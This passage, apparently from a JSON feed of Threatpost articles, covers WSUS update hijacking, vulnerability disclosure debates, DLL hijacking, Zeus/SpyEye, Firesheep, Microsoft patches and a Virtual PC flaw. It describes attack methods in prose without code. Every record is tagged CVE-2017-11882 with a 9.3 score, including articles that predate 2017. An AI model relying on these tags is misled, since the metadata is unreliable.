An attacker who manages to get a malicious update into an organization via WSUS could do anything from removing, downgrading or stopping patches from being installed to getting full control over servers and desktops.\n\n\u201cIt\u2019s the worst-case scenario and it\u2019s fairly bad,\u201d Stone said. \u201cAnd it\u2019s not a vulnerability, it\u2019s not something for Microsoft to fix.\u201d\n\nStone and Chapman said they\u2019ve had a dialogue with Microsoft about their research, which Microsoft acknowledged and said that it recommends enterprise admins turn on SSL. Doing so requires provisioning an SSL cert for machines doing the update, a process that cannot be automated.\n\n\u201cIt\u2019s not difficult and it\u2019s something that most admins would know how to do,\u201d Stone said. \u201cMicrosoft cannot do it by default. They could prevent it from working until a cert is put in, I suppose.\u201d\n\nStone and Chapman said they decided to tackle drivers because most are written by third parties for Windows servers and clients, and made for an easier target because, despite the fact that updates are signed and verified by Microsoft, XML metadata can be updated so that it points to, downloads and executes a malicious update.\n\nFrom Stone and Chapman\u2019s [paper](<http://www.contextis.com/media/documents/CTX_WSUSpect_White_Paper.pdf>):\n\n> Windows Update will verify that each update is signed by Microsoft. However, there is no specific \u2018Windows Update\u2019 signing certificate\u2013any file that is signed by a Microsoft CA will be accepted. By injecting an update that uses the CommandLineInstallation update handler, an attacker can cause a client to run any Microsoft-signed executable, even one that was not intended to be used in Windows Update. Even better, the executable can be run with arbitrary arguments. 
Therefore we need to find a suitable executable that will allow arbitrary commands to be executed.\n\nThey turned to the [Windows Sysinternals tool, specifically the remote command utility called PsExec](<https://technet.microsoft.com/en-us/sysinternals/bb896649.aspx>), which is signed by Microsoft.\n\n\u201cEssentially, we made a program which man-in-the-middles the WSUS traffic, and then created a fake update and then told the machine to download PsExec and run it with whatever arguments to do something malicious,\u201d Chapman said. \u201cThat\u2019s the attack. The really fun thing is that all updates are installed as system whether you\u2019re a low privileged user or an admin. So this is quite powerful.\u201d\n\nThe only prerequisite for the attack is to already be on the network. From there, even an unauthenticated attacker can run the attack for any machine running WSUS without SSL to run arbitrary commands, Chapman said.\n\n\u201cThe hard thing was just finding the signed Microsoft executables we could put down and run to do useful things,\u201d Chapman said.\n", "cvss3": {}, "published": "2015-08-07T09:00:28", "type": "threatpost", "title": "Manipulating Microsoft WSUS to Own Enterprises", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-08-07T00:20:31", "id": "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "href": "https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "Database Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. 
Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)\n\nQuite often in our industry, two (or five) people can look at the same problem from different angles, and see radically different things. Rare is the situation that reads the same to everyone, forwards and backwards. It\u2019s all about perspective.\n\nIn my appearance on the \u2018[Partial Disclosure Dilemma\u2019 Panel](<http://blogs.msdn.com/katie_moussouris/archive/2009/03/09/the-partial-disclosure-dilemma-panel-at-sourceboston.aspx>) at [SOURCEBoston](<http://www.sourceconference.com/index.php/source-boston-2009>) this year, I found myself surrounded by great minds who most certainly do not think alike. 
While there was some agreement and common ground between all parties on the dais, namely wanting to make the Internet safer and protecting people, there was little agreement on the best way to accomplish that goal.\n\nThe conversation between us friends and colleagues, both on stage and in the audience, wended its way down many tangential paths, most of which I will have to watch again on the video to fully understand how we got from Partial Disclosure to Dan Kaminsky saying \u201cMore people have died from windows crashing on them than from Windows crashing.\u201d But I promised my redux of the panel, so I will guide you down the path I think was most interesting.\n\n**[ **[**Partial disclosure, complete disagreement**](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)** ]**\n\nThe disclosure issues around [Dan Kaminsky\u2019s DNS vulnerability](<http://www.ioactive.com/docs/CERTAdvisory.doc>) were one seed of the panel idea. If you are reading this blog, then I will assume that you\u2019ve heard of this vulnerability, else you must have been living under an Amish rock in a Luddite colony, high in the brisk, thin air of the Himalayas.\n\nAs far as the disclosure route he chose and how that played out, he executed a plan he thought was best in order to get vendors to fix a serious issue (they did), *and* to get as many affected customers protected (some were) with the fix in place before broadly releasing the technical details. He let a small number of people know the details, in the hopes that delivering those details to the right people and no one else would best protect the world\u2019s critical infrastructure. Hence, the term \u2018partial disclosure\u2019 was used to describe his approach. 
Other notable researchers [thought it was just hype](<http://twitter.com/tqbf/statuses/853104857>), [then took it back once they had spoken to Dan](<http://www.matasano.com/log/1089/dan-kaminsky-could-have-made-hundreds-of-thousands-of-dollars-with-this-dns-flaw/>), [some pretty much figured it out on their own](<http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html>), or [chatted about it on DailyDave](<http://lists.immunitysec.com/pipermail/dailydave/2008-July/thread.html>). It was [weaponized](<http://blog.metasploit.com/2008/07/bailiwicked.html>) shortly thereafter, and a couple weeks after his initial announcement, some affected people had applied the update and some unfortunately hadn\u2019t. There were certainly more details I\u2019m skipping here, but that\u2019s the skinny.\n\nNow that the panel stage was set, here\u2019s one of the topics I thought was interesting.\n\nIn our introductions, we each counted ourselves among the security research community. Some of us had also been or still are consultants, all of us had done the startup thing, and some of us had been in charge of running some kind of computing infrastructure. \nAt the risk of sounding immodest, I believe I had a unique perspective on the topic of responsible disclosure as I was the only panel member who has been, at various stages in my career, a vulnerability Finder, Coordinator, and a Vendor (for both open and closed source software).\n\nLet my official punditry from this pugnacious pulpit begin. \ud83d\ude09\n\nIt was interesting to me that the panelist who most strongly endorsed \u201cinflicting pain\u201d in the form of exploit release in order to provide the necessary \u201cwake up call\u201d to vendors had never been responsible for maintaining any kind of infrastructure deployment. 
We all know how much easier it is to break something than it is to build it or to fix it, yet there is a pervasive attitude among many security researchers that nothing should be more important than security, not even the business itself.\n\nAnd that\u2019s where our disagreement\u2019s footing took a stronger hold on its rocky purchase. Define pain, our moderator asked. Who decides on the form the pain will take and how intense or widespread it is, I asked.\n\nSure, it took some [pain](<http://news.cnet.com/At-software-giant,-pain-gives-rise-to-progress/2009-7349_3-6220566.html>) to get the [attention](<http://blogs.msdn.com/sdl/archive/2009/02/18/early-days-of-the-sdl-part-one.aspx>) of software vendors to fix their products and [build security in from the ground up](<http://blogs.msdn.com/sdl>). But as security folks, aren\u2019t we tired of having to use the same arguments of active, widespread exploitation to *prove* that something needs to be done? Security people often complain that not enough has changed since the [epoch began](<http://en.wikipedia.org/wiki/Unix_epoch>), but if that\u2019s true, then why have we not looked at ways to stop beating our heads upon the supposed brick wall of vendors or deployers of technology, and instead tried something different to get the right eyes on the right issues at the right time to do the right thing? Doesn\u2019t executing the same behavior over and over again but expecting different results equal insanity? When are we willing to stop the madness?\n\nAt the end of the panel we were each asked to describe our security utopia. My Shangri-La was this: I would like to see more cross-over among those of us who say the sky is falling and those of us upon whom the sky will fall.\n\nCommunication between two groups with different mindsets requires a [lingua franca](<http://www.emergentchaos.com/archives/2009/02/boundary_objects_and_thre.html>) other than exploitation. 
One might think that math is the language of the universe, and Proof of Concept serves as the mathematical proof needed for anyone and everyone to arrive at the logical conclusion of \u201cdrop everything NOW and create (if you\u2019re a vendor) or apply (if you\u2019re managing infrastructure) the update.\u201d Before I had ever been responsible for building anything or protecting anything, I might have agreed with that, since it made perfect logical sense to me at the time, in the context within which I worked.\n\nBut it\u2019s not doing the trick of convincing all vendors and all deployers by a long shot, so obviously, we need something to change. PoC can and should be part of the conversation between responsible researchers and people to whom they are reporting the issues, but it must be framed appropriately for the listener. PoC is not that simple for non-security types to immediately frame the same way we do as security people. Even if they do grok the severity of the situation, they may not be *able* to move as quickly as a researcher feels they should.\n\nConsider this, researcher-types: If you\u2019ve never managed infrastructure before, or been responsible for shipping and maintaining complex and widely deployed code, then you don\u2019t have the context to understand why there are sometimes legitimate reasons to do things more carefully and therefore more slowly. Once the talk recordings are posted, check out the very thorough treatise by our own MSRC on [How Microsoft Fixes Security Vulnerabilities: Everything you wanted to know about the MSRC Security Update Engineering Process](<http://www.sourceconference.com/index.php/source-boston-2009/boston-2009-sessions>). Think about how you as a researcher and security expert would react if some CTO or IT person or developer who lacks your depth of security knowledge and subject matter expertise came and told you what to hack, how to hack, and at what pace to hack it? 
That\u2019s essentially what you\u2019re doing when you say \u201cyou should be able to fix it and fix it now, and if you don\u2019t do it on my timeline, then you obviously need to be made an example of so I\u2019m going to release an exploit for it into the wild.\u201d\n\nThey don\u2019t swim in your security research toilet :-), so why must you pee in their development or infrastructure pool?\n\nOkay, I couldn\u2019t resist making the joke \u2013 and no, I don\u2019t think [security research is a cesspool](<http://spiresecurity.typepad.com/spire_security_viewpoint/2005/03/not_again.html>), or I wouldn\u2019t have [founded two vulnerability research programs](<http://blogs.msdn.com/sdl/pages/about-us.aspx#k8e>) in my career. What I am saying is that all of us should be striving for the delicious harmony of combining your chocolate with my peanut butter, your gin and my tonic, your milk and my shake, in order to make the whole greater than the sum of its parts. As a researcher, one can choose to be the sabot and grind gears to a halt to prove a point, or one can be the grease that moves things along with less friction, earning the trust that will allow each subsequent notification pill to be swallowed more easily. As a developer or deployer, one can choose to stuff up one\u2019s ears until someone firmly inserts an icepick, or one can strive to fix things as quickly and safely as possible and learn from the experience to continually improve and speed up that process over time.\n\nWe need a better way to reach our common ground of protecting the computing environment on which we all rely. Researchers need a means by which to communicate urgency that avoids descriptive hyperbole or causes damage, which erodes trust. Developers and deployers need a better way to service existing code and infrastructure reliably, safely, and rapidly if necessary, to build trust among the researcher and customer communities that they are doing the best they can at any given time. 
Around here, we\u2019ve done serious work on making this a reality on the development front, with the dual-ninjas of SDL (proactive) and MSRC (reactive). I\u2019d like to see SDL someday brought up to a full double-D in the form of a Secure Development and Deployment Lifecycle, to build infrastructure design and servicing models that are resilient in the face of threats to deployments as well as software. Perhaps I can begin to work on this here at Microsoft, if I can get some of my [other work done first](<http://blogs.msdn.com/sdl/archive/2008/09/11/new-addition-to-the-starting-line-up.aspx>). \ud83d\ude42\n\nAfter we had each said our piece on what our security utopia looked like, that\u2019s where we left things. No agreement could be reached in the two hours or so we were on the stage, which is no surprise. If the tape ran out before the end, then you won\u2019t get to see us literally \u201chug it out\u201d after all was said and done, disagreements notwithstanding. I continue to have tremendous respect and share camaraderie with my fellow panelists and with researchers around the world. It is my hope that the determination and vision of those on any side of the equation who can see across the role boundaries of researcher, vendor, and deployer will usher us into a new age.\n\nPeople often ask what more is there to say about disclosure that hasn\u2019t already all been said. I think the real conversation on how to get the results we all desire \u2013 to get things fixed *in spite of* our disagreement \u2013 has yet to truly begin.\n\nI\u2019m listening, as well as talking. Are you?\n\n_* [Katie Moussouris](<http://blogs.msdn.com/katie_moussouris>) is a senior security program manager in Microsoft\u2019s Secure Development Lifecycle (SDL) team. 
\n_\n\n_Photo credit: Microsoft._\n", "cvss3": {}, "published": "2009-03-23T20:02:26", "type": "threatpost", "title": "Partial disclosure: Was it a cat I saw?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T17:57:44", "id": "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "href": "https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/72387/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:10", "description": "[](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)A day after [Microsoft released information on the remotely exploitable DLL-hijacking vulnerability](<https://www.microsoft.com/technet/security/advisory/2269637.mspx>) that affects dozens of Windows applications, researchers are starting to discover exactly which pieces of software are vulnerable. The list so far includes PowerPoint, Wireshark and some applications that are included by default with Windows Vista, and possibly Windows 7.\n\nThe class of vulnerabilities that is being described as DLL hijacking or DLL preloading enables an attacker to hide a malicious DLL in a directory on a network or WebDAV share and convince a user to open a file that will silently load the DLL. The vulnerability itself has been known for at least 10 years, but Microsoft officials had considered it a low-impact flaw because it was thought that an attacker would only be able to exploit it locally. However, researchers such as Aviv Raff and others have shown in recent years that it could be exploited remotely under some circumstances.\n\nAnd late last week HD Moore of the Metasploit Project and Rapid7 said that he\u2019d found other reliable ways to remotely exploit the flaw and had identified 40 or so Windows applications that are vulnerable. Moore detailed his findings in a [blog post](<http://blog.rapid7.com/?p=5325>) Tuesday. 
Now, information is beginning to filter out about exactly which applications are vulnerable, along with exploit code for some of them.\n\nEarly Tuesday, exploit code for the DLL hijacking flaw was posted for both [Microsoft PowerPoint](<http://www.exploit-db.com/exploits/14723/>) and [Wireshark](<http://www.exploit-db.com/exploits/14721/>), a network protocol analyzer. Raff also said [in a message on Twitter](<https://twitter.com/avivra/statuses/21994799124>) Tuesday that some software included with Windows Vista, and possibly Windows 7, is vulnerable to the attack. Microsoft has not released a list of which applications are known to be vulnerable to the DLL-hijacking flaw, nor has Moore. \n\nWhile Microsoft is in the process of continuing its investigation into the class of flaws, the company has published a description of the problem, along with a [tool that can help mitigate the DLL-hijacking vulnerability](<http://support.microsoft.com/kb/2264107>). Moore also has [released an audit tool](<http://blog.rapid7.com/?p=5325>) that can identify vulnerable applications on a local system. \n\n**[See: [HD Moore on the Windows DLL Vulnerability podcast](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)]**\n\n\u201cWhen an application loads a DLL without specifying a fully qualified \npath name, Windows will attempt to locate the DLL by searching a defined \nset of directories. We have discussed the DLL search path [on this blog](<http://blogs.technet.com/b/srd/archive/2009/04/14/ms09-014-addressing-the-safari-carpet-bomb-vulnerability.aspx>) and it has also been explained well on [David LeBlanc\u2019s blog](<http://blogs.msdn.com/b/david_leblanc/archive/2008/02/20/dll-preloading-attacks.aspx>). 
\nFor the sake of this issue, it\u2019s sufficient to say that if an attacker \ncan cause an application to LoadLibrary() while the application\u2019s \ncurrent directory is set to an attacker-controlled directory, the \napplication will run the attacker\u2019s code. [Development best practices](<http://msdn.microsoft.com/en-us/library/ff919712%28VS.85%29.aspx>) state \nthat applications should call SetDllDirectory with a blank path before \ncalling LoadLibrary(\u201cfoo.dll\u201d) to ensure that foo.dll is not loaded from \nthe current directory. We are investigating whether any of our own \napplications are affected by this class of vulnerability so that we can \ntake appropriate action to protect customers,\u201d Microsoft\u2019s [Jonathan Ness said in a blog post](<http://blogs.technet.com/b/srd/>).\n\nThe first public mention of this class of vulnerabilities appears to have been an [advisory posted to BugTraq by researcher Georgi Guninski](<http://www.securityfocus.com/bid/1699/info>) in 2000, in which Guninski details the problem and lists dozens of versions of Windows that are susceptible to the attack. Raff also [discussed the DLL problem](<http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx>) publicly back in 2006. 
\n", "cvss3": {}, "published": "2010-08-24T14:47:41", "type": "threatpost", "title": "DLL Hijacking Exploit Code Posted for PowerPoint, Other Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:10:15", "id": "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "href": "https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/74370/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:38", "description": "[](<https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/>)Everyone knows that the first year of marriage can be a tough one -around three percent of them end in the first 12 months. Looks like the same can be true of malware marriages, with the union of the Zeus and SpyEye Trojan now in question.\n\nJust one year after news broke that the Zeus and SpyEye Trojan families had merged, virus experts say there\u2019s reason to question whether the union is still intact.\n\nResearchers at Microsoft and Kaspersky Lab told Threatpost that, although there\u2019s clearly evidence that code was shared between the two malware families, the rumored merger of Zeus and SpyEye never took place. In fact, the two botnets continue as separate entities, with some researchers wondering if they are even controlled by the same individuals or criminal groups.\n\nZeus and SpyEye were the two main families of botnet software, with SpyEye [playing the role of upstart competitor to the more established Zeus](<https://threatpost.com/tracker-spyeye-not-yet-zeus-stature-110910/>). 
For a while, the competition for online hosts was intense, with [both malware families adding features to remove the other on systems they infected](<https://threatpost.com/malware-trojan-wars-spyeye-vs-zeus-040110/>).\n\nThat rivalry seemed to end in October, 2010, when researchers observed what appeared to be a merger of the two crime kits, around the same time that the author of the Zeus botnet decided to release the malware code as an open source repository. Those reports were backed by online forum posts by the SpyEye author claiming that the Zeus source code had been turned over to him and that the two Trojans [would soon be \u201cmerged into one powerful Trojan](<http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/>).\u201d\n\nBy the end of 2010, an update to the SpyEye crimeware toolkit (1.3.X) included a feature, formerly unique to the Zeus crime kit, that targeted an anti-Trojan agent developed by the firm Trusteer. The new version of SpyEye also removed a feature to remove the Zeus malware if it was found running on the affected machine, Microsoft said.\n\nDespite some early reports that a merged SpyEye/Zeus Trojan was circulating online, the promised merger never happened, beyond some basic cutting and pasting of code. In fact, subsequent reports suggested that the two malware families were [continuing down separate tracks, with Zeus adding new features not seen in the other](<https://threatpost.com/zeus-malware-not-dead-yet-new-features-being-added-030411/>).\n\nNow Microsoft says that reports of the merger may have been overblown. 
In a post Tuesday on the company\u2019s Threat Research and Response Blog, researchers said that they considered reports of the union to be \u201cspeculative\u201d and saw little evidence that Zeus and SpyEye were sharing code.\n\nThe company declined to discuss the specifics of its research, but stood by the statement in its blog post.\n\nDmitry Tarakanov, a researcher at Kaspersky Lab who has studied the two families said that there was a code transfer from Zeus to SpyEye in the immediate aftermath of the source code being transferred to the SpyEye author. For example, the SpyEye author grabbed a Zeus feature that allowed the malware to force Web browsers on infected systems to load malicious HTML served by the botnet, even in cases where the host had a recent version of the page in question (say, an electronic banking site) stored locally in its browser cache. \u201cSpyEye could not intercept the cached html-code,\u201d Tarakanov wrote in an e-mail. \u201cSo the author of Spyeye had seen that part of the code where Zeus replaces the cache as well and added that part of code into his own source code of SpyEye.\u201d\n\nBut there\u2019s little evidence of further consolidation of the two code bases after that, he said. \u201cWe can make a conclusion that author of SpyEye did not even try to concoct one bot squeezing all the best from two source codes,\u201d he wrote.\n\nTarakanov said he believes the original author of Zeus was interested in washing his hands of the malware industry, especially with increased attention to the Zeus malware by law enforcement. In September, 2010, more than 60 individuals were charged in the U.S. and U.K. for crimes linked to the Zeus botnet. That may have chased the bot\u2019s original author into hiding.\n\nHuman nature may explain the SpyEye author\u2019s failure to carry out a grand union of the two botnets that was originally promised. \u201cPeople tend not to change work,\u201d Tarakanov wrote. 
In other words: \u2018if it ain\u2019t broke, don\u2019t fix it,\u2019 as the saying goes.\n\nHowever, it\u2019s harder to explain the subsequent modifications to the Zeus code, which Tarakanov said are \u201ctoo serious and notable\u201d to be the work of amateurs. While it\u2019s possible that the SpyEye author would choose to keep the malware families separate, it\u2019s harder to understand why new features added to Zeus weren\u2019t also added to SpyEye. \u201cA programmer really does not like to code one thing twice. So, it\u2019s hard to believe that the author of SpyEye somehow developed new features (but different) for SpyEye and for Zeus,\u201d he wrote.\n\nOne possibility is that both tools are being offered to cyber criminals simultaneously, rather than requiring any one set of customers to adapt or abandon their platform of choice, or asking everyone to switch to a new, merged platform. Aviv Raff, the CTO of Seculert, said in June that his researchers had found [evidence of back-end servers that are being used to host both the Zeus and SpyEye crimeware packs](<https://threatpost.com/malware-exploit-kit-writers-merging-their-talents-062411/>). Attackers who are interested in using one or the other can have their choice of which tool they\u2019d like to use at any given time, said Raff, who expects greater convergence of crime kits like SpyEye and Zeus and Web exploit kits in the future. \n\nIt\u2019s also possible that main development of Zeus has been passed to a third party now that the malware source code is available online. \u201cThe situation is too muddy and there are too many conflicting arguments,\u201d Tarakanov said. 
\n", "cvss3": {}, "published": "2011-10-14T17:58:10", "type": "threatpost", "title": "SpyEye and Zeus Malware: Married Or Living Separately?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:35", "id": "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "href": "https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/75755/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy \nsettings for the next version of their search engine. Currently the site strips \nSSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling \nan unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension ](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>)allows \nattackers to capture site cookies from users on unsecured wireless networks and \nbrowse under their logon. \n\nWith the advent of Firesheep and subsequently, its surge of recently \nconverted hackers, HTTP session hijacking is becoming more and more of a \nconcern. Sites like Bing will have to adopt suitable security techniques to \ncontend with the extensions\u2019 further proliferation. \n\nFirefox 4, scheduled for release by the end of the year will \nhelp. [As \nreported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport \nSecurity, ensuring the browser always requests a safe HTTPS session from sites. 
\nHowever, if sites like Bing don\u2019t implement SSL, the lack of full-end \nencryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network \nWorld has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n\n** \n**\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. 
However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. 
Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:54", "description": "In the space of a given year, untold thousands of vulnerabilities are found in operating systems, applications and plug-ins. 
In many cases, the affected vendors fix the flaws, either with a patch, a workaround or some other mitigation. But there\u2019s also a huge population of security bugs that vendors never fix because they\u2019re deemed unexploitable, an assumption that may be turning into a serious mistake for software makers.\n\nMicrosoft made such a call earlier this year, after [researchers at Core Security](<http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug>) informed the company that they had found a [vulnerability in the Microsoft Virtual PC software](<https://threatpost.com/microsoft-virtual-pc-flaw-lets-hackers-bypass-windows-defenses-031610/>). The flaw, which affected the virtual machine monitor (VMM) in Virtual PC, could enable an attacker to use applications running in user-space on a guest OS to access portions of the Virtual PC memory that should be inaccessible to those applications. This gives the attacker the ability to bypass anti-exploitation technologies in the underlying operating system and exploit flaws in the OS that otherwise would not be exploitable.\n\nThis problem was especially thorny for Microsoft because Virtual PC allows Windows 7 users to run applications designed for older Windows versions in a virtualized environment on their Windows 7 machines. This functionality has helped the deployment of Windows 7 in enterprise environments by making more legacy apps viable.\n\nBut Microsoft\u2019s security team said that the [Virtual PC problem was not actually a vulnerability](<http://windowsteamblog.com/blogs/windowssecurity/archive/2010/03/16/vulnerability-in-virtual-pc.aspx>) and the company hasn\u2019t released a fix for it. \n\n\u201cThe functionality that Core calls out **is not an actual vulnerability** \nper se. Instead, they are describing a way for an attacker to more \neasily exploit security vulnerabilities that must already be present on \nthe system. 
It\u2019s a subtle point, but one that folks should really \nunderstand. The protection mechanisms that are present in the Windows \nkernel are rendered less effective inside of a virtual machine as \nopposed to a physical machine. There is no vulnerability introduced, \njust a loss of certain security protection mechanisms,\u201d Microsoft\u2019s Paul Cooke wrote in a blog post at the time. \n\nSoftware companies large and small make these kinds of judgments on a daily basis during both the development process and the life span of a deployed product. The mere presence of a bug or vulnerability in an application doesn\u2019t mean that an attacker could necessarily use the flaw to compromise a system running the software. Plenty of bugs just cause the software to act flaky or become unstable or hang without offering an attacker any inroads into the machine. \n\nSo fixing these problems isn\u2019t always a top priority for software makers, especially if they\u2019re on tight deadlines or strict budgets. And there\u2019s always the compatibility problem to take into account: If a patch breaks some other service or feature in the application, then it may just infuriate users. So maybe all of that customer aggravation isn\u2019t worth it.\n\nThe difference in this case, experts say, is that the Virtual PC vulnerability is the symptom of a larger problem lurking beneath the surface: assuming that protections such as ASLR, DEP and SafeSEH will always be around to save us.\n\n\u201cWe\u2019re less worried about this particular vulnerability than we are \nabout the now-exposed (incorrect) assumption that various security \nmechanisms will always be in place. It\u2019s obvious that a complete \nre-calibration of exploit potential for uncategorized bugs will become \nnecessary if vulnerabilities like the one described here remain in our \nfielded systems. 
